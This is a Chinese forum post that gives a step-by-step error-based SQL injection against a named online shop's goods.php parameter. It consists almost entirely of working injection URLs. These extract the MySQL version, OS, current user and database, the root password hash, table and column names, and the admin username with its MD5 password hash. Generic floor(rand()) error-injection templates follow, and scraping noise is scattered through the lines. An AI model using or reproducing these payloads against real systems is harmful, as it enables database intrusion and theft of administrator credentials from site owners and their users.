判断版本号 ( o9 y: h% P/ s
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: H. [# [( s& F) R6 j4 z ^
% {7 h# Y% N/ U% t$ G
判断系统
" g: d- v. }) K6 |) a
; ^0 Q0 ]* X5 K4 thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 i; y# ^, K1 z* ~- e7 `
9 W! P: c- x7 Y& w2 G5 @8 g, Y7 c) K7 h* w4 G: i7 [" h
8 T) I' n W( O* V) P& ^# k& U
当前 user()+ i4 W. `& s! p( l" z: `
5 W- E g$ {9 X3 x! X8 T/ c1 ?) Mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' m+ y' p* T" U4 U. G$ }
4 t1 i; T# a" o) L) x
# R" R* s C) q7 m7 N: q3 h/ M% n: p Z8 R
当前 database()
" c0 ]' ~, X9 R2 n% shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, Z3 K8 k& J2 ~9 X4 x P# T) R. w! c" C, k- j1 Q( L
8 y3 y) k1 j9 B' Y8 E8 o
8 y' H3 D: @; A4 q0 b6 W4 V
1 y! G5 i4 b( L- iroot hash+ P( z0 L' l$ W' k
8 i5 `0 U. u7 B0 g- rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' l- p& L8 D' s3 c/ C
7 e7 Y$ ~8 O8 I. o
0 _. }% g4 I! ~" Q4 z
% a; t Z( h; y9 N* w当前 数据库表名
* N0 U8 u4 }0 s' A, {7 s! X* o8 f& s0 C4 r8 W8 B; b; i
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. L) j8 P' Z) k S3 a$ O2 q1 O3 M0 l' U7 v% Z8 i2 M- u9 t* a
; J+ n9 x0 f( A& g& Y
7 U% B" S4 T6 i" l当前 数据库 user_name 字段# u z! @9 `" Y K& a
- M4 s- _4 j" A" g/ U0 T) K
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" U2 F3 a: h, a# n, ~ ?9 n0 V3 [) h
& H W* ^: q5 ^# C( v1 S当前 数据库 字段 password& O9 z$ R" t; }4 l
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 H8 X# w; O3 h x* ^( n/ ~1 h. `
2 D/ s4 N/ ^, ~, I" N i# s$ [: X! ]% n; D7 M0 p
获得 admin passwd(md5)
. \" Q) R8 \. t
d0 M- x7 w" @& ~
" Z- e( e' S1 p9 Mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; p3 C; Q x9 N$ S' E+ L% d# B
8 Z0 [- j& v. t' W, [0 Z
报错注射
0 h9 _$ n$ _+ M+ k% B6 j" DSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
" \+ g) b6 S' _. H! b' }0 E1 S9 p+ m; ?$ y
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)4 q7 G/ X9 k. a7 `6 w
9 A$ @4 P; s4 y5 |2 f( J3 Z' S
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |
发表于 2012-9-5 14:59:30
收藏
支持
反对